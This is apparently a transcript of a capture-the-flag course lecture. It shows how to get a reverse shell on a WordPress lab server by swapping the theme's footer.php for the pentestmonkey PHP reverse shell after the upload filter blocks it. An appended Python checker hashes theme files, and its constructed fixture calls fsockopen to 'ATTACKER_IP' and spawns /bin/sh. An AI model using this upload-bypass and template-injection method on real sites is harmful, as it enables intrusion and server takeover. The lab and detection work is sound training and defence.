In this course, we explore brute force attacks, hacking WordPress, changing users, and suid privilege escalation. We'll do this through a CTF (capture the flag) ethical hacking game called Mr. Robot.
Hi, within this lecture, we're going to try and hack into the server. We are using WordPress vulnerabilities or some kind of tricks over here. So, what I'm going to do, I'm going to go into the 'Library' and see if we can upload something over here. The basic trick is that if you can upload a php-reverse-shell over there, then you can get a shell back. This is what happens mainly in the WordPress CTFs. I'm going to try that. But, I don't know if it's going to work or not. So, I'm going to search for 'php reverse shell cheat sheet', like we did with Python in the previous section. Now, of course, I'm going to go into the 'pentestmonkey' one one more time. And say, yes, let's go over here. And I'm just going to find the PHP one-liner. So, this is good. And as you can see, it says that, "If you want a .php file to upload, see the more featureful and robust php-reverse-shell." This is just a one-liner that you run in the command line, in the terminal. But, we don't need that. We actually need a file to upload so that we can test if we can actually upload a .php file to the server. So, come over here and just find the php-reverse-shell. And over there, I believe, we should have some download button. It says, don't forget to change the IP and port, and listen with Netcat in another terminal, and just make sure you run the PHP code. I don't know if we can do that yet. We're going to try and see. So, I'm going to 'Download' the php-reverse-shell. So, let's come over here. And let's see. Let's go to 'Downloads' and here we go. Let's look over this for PHP. Let me search for PHP. So, I cannot seem to find it. Here you go. And this is, for some reason, a tar.gz. Let me just take it into the 'CTF' folder, under MrRobot; I'm going to paste this over here. So, this is tar.gz. Let me try to just unzip it from here. Like, we can use 'gzip' to just unzip this, or let me just run 'ls -la'. Here you go. This should have been gzip, but let me try this. 
So, I'm going to write 'php-reverse-shell-1.0.tar.gz'. It says that it already has gz. Yes, we have to specify. We're going to decompile this. It says, "unexpected end of file." So, let me 'double-click' on this one. Yes, it doesn't really work. It is like an empty file. I believe there was something wrong with downloading it. So, let me try this one more time. I'm going to try with 'gzip2', but we don't have gzip2, for some reason. Let me just run 'gzip --help' and see. Yes, we are doing this right, we're decompressing this. I believe there is something wrong with the file itself. So, let me try and figure out how to proceed over here. So, if we can try to download this one more time, and here you go. Kali says that this file contains malware, so it made it unavailable. If you click on this icon over here, you can just say 'Open', and it will open that file for you. So, Kali thought that this is malware or something like that. So, I'm going to delete it. But, just take this php-reverse-shell out of it and put it over in the folder over here. So, we don't need the rest of it. I'm going to just 'Move to Trash' and come over here and find your PHP file. Open this with any kind of editor, like Leafpad or anything you have really. I'm going to choose 'Geany', but you can even open this with nano itself. Because all we need to do is just change the IP address and change the port. So, for the IP address, I'm going to write my own Kali Linux IP address, which is 10.0.2.4, in my case. And I'm not going to even change the port. So, the port is 1234, which is perfectly fine for me. So, I'm going to close this down and I have a php-reverse-shell over here. So, if I can run this on the WordPress, then I can run this on the server that holds the WordPress. I can get a reverse shell back. So, let me see if I can upload this to the WordPress. I'm going to come over here to 'MrRobot' and find my shell and just 'double-click' on it, and here you go. 
It says, "This file type is not permitted for security reasons," which makes sense. So, I'm going to copy this one and paste it over here and try to just play with it a little bit. What can we do? We can just rename this and change the extension a little bit. I'm going to call this 'myshell.php.png'. So, it looks like a PNG file, but it's actually a PHP file. Even though we can upload this, maybe it won't get run by the server. But again, it's worth a shot. Here you go. It doesn't let us do that. So again, even though this has a PNG extension, it doesn't allow us to upload this. So, I'm going to go to 'Google' and just find a JPEG or PNG file. I'm going to search for 'metallica' since this is my favorite band. You can do this with your own favorite band as well. I'm going to just 'Save' an image over here. I'm going to call this 'metallica.jpg'. And apparently, I already have this in my Downloads. So, let me come over here and find that. And try to see if we can actually upload anything over here. And apparently, we can. So, as you can see, this picture got uploaded to the server, but we cannot do that with PHP. We cannot just upload PHP files over here. So, I'm going to change this to something like php.jpg, to see if there's something wrong with the PNG file and if it's okay with the JPG file. I'm going to come over here and just choose this one. Here you go, it doesn't let us. So, the filtering works very well. As you can see, it doesn't let us upload PHP files. So, what am I going to do? I'm going to go to 'Appearance', then 'Editor', and I'm just going to change the PHP code itself. So, I'm going to just change the PHP code and just copy and paste the reverse shell in here. So, over here, we're going to have to find a thing like a footer or 404 template in order to paste our code. So, it won't get recognized by the editor or it won't get recognized by the developer, and it gets called. It gets executed every time we visit the WordPress page. 
So, something like a footer, or you can just put it in the 404 template and just go for a page that doesn't exist. It's a good strategy as well. So, I'm going to come over here to our web server, which is 10.0.2.15. And over here, we don't even see something like a real WordPress blog or something like that. So, maybe we can try to find something related to WordPress so that we can get to see the footer and header. So, let me see, this is footer.php. And there is an archive.php, comments.php. We can just try to go to 404.php, or maybe we can just trigger this from the server as well. What we really need to do is just find an optimized place to put this code into. So, I'm just going to try with footer. And we can just come over here and just run the footer.php. And here we go, we see a blog. So, we can just reload this file and see if this works or not. So, before reloading, of course, we're going to change the content of this footer. So, this is the footer itself, I believe. It really doesn't matter. All I'm going to do, I'm just going to copy the reverse shell code and paste it over here and see if that works or not. And you can just delete this 'footer.php'. I'm just going to copy this so that if we break something, we can always come back and paste it back. I'm going to put it under my 'notes.txt'. And I'm just going to paste it over here if I can. No, let me try one more time. No, it doesn't work. Let me try 'Paste Clipboard'. Here you go. It works. Now, this is over here. So, if I break something, I can go back and just take it from there. Now, let me delete everything here. Delete everything in the footer.php and just open my reverse shell and copy everything from here. And say 'Copy' and just come back and paste it over there. So, my footer is a reverse shell right now. So, if I can update this file, as you can see, it says, "File edited successfully." Then, let me just try and listen for incoming connections on port 1234. 
So, we're doing that with Netcat. And let me just 'Refresh' this, and here you go. The footer disappeared, but it should send the connection back, and here you go. We are inside of the server. We managed to hack the server. If I run 'id', we are daemon. And if we run 'whoami', here you go. Of course, we are not root. It is not wise to expect to be root when we first hack in, but we're going to try and escalate our privileges. So, here we go. We can see some files. We can browse here. We can see what kind of things there are inside of the /etc/passwd and stuff. But, we hacked into the server. That's what's important. I'm going to stop here. And within the next lecture, we can see what we're going to do to escalate our privileges and become root.
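The lecture shows the two controls that matter on the defensive side: the media upload filter that rejects PHP even under a double extension, and the theme editor that let a footer template be replaced with arbitrary PHP that runs on every page view. The check a site owner would want is a known-good hash baseline of the theme's .php files plus a scan for socket- and process-spawning calls that a footer or 404 template never needs. This is an added example, not part of the course; the theme directory, file contents and the tampered footer are constructed.

```python
"""Spot a theme template swapped for a web shell: compare every .php file under the
theme against a known-good hash baseline and flag calls to socket/process primitives.
Added example (not from the course); directory layout and contents are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path

# PHP functions that open sockets or spawn processes; rare in legitimate templates.
SUSPICIOUS = re.compile(r"\b(fsockopen|proc_open|shell_exec|passthru|popen|exec|system)\s*\(")

def build_baseline(theme_dir: Path) -> dict:
    """Hash every .php file under the theme while the site is known-good."""
    return {str(p.relative_to(theme_dir)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(theme_dir.rglob("*.php"))}

def audit_theme(theme_dir: Path, baseline: dict) -> dict:
    """Return {relative_path: [findings]} for changed, new, missing or suspicious files."""
    current = build_baseline(theme_dir)
    findings = {}
    for rel, digest in current.items():
        issues = []
        if rel not in baseline:
            issues.append("new file not in baseline")
        elif baseline[rel] != digest:
            issues.append("hash differs from baseline")
        calls = sorted(set(SUSPICIOUS.findall((theme_dir / rel).read_text(errors="replace"))))
        if calls:
            issues.append("suspicious calls: " + ", ".join(calls))
        if issues:
            findings[rel] = issues
    for rel in baseline.keys() - current.keys():
        findings[rel] = ["file missing"]
    return findings

def demo() -> dict:
    """Constructed scenario: footer.php is overwritten after the baseline was taken."""
    with tempfile.TemporaryDirectory() as d:
        theme = Path(d)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n</body></html>\n")
        (theme / "404.php").write_text("<?php get_header(); ?><h1>Not found</h1>\n")
        baseline = build_baseline(theme)
        # Constructed tampering, not a working shell: the footer now opens a socket and a process.
        (theme / "footer.php").write_text(
            "<?php $s = fsockopen('ATTACKER_IP', 1234); proc_open('/bin/sh', [], $p); ?>\n")
        return audit_theme(theme, baseline)

if __name__ == "__main__":
    for path, issues in demo().items():
        print(path, "->", "; ".join(issues))
```

Run against a real install, the baseline would be taken from a clean checkout of the theme and the audit scheduled alongside setting DISALLOW_FILE_EDIT in wp-config.php, which removes the in-browser theme editor the lecture relies on.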
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.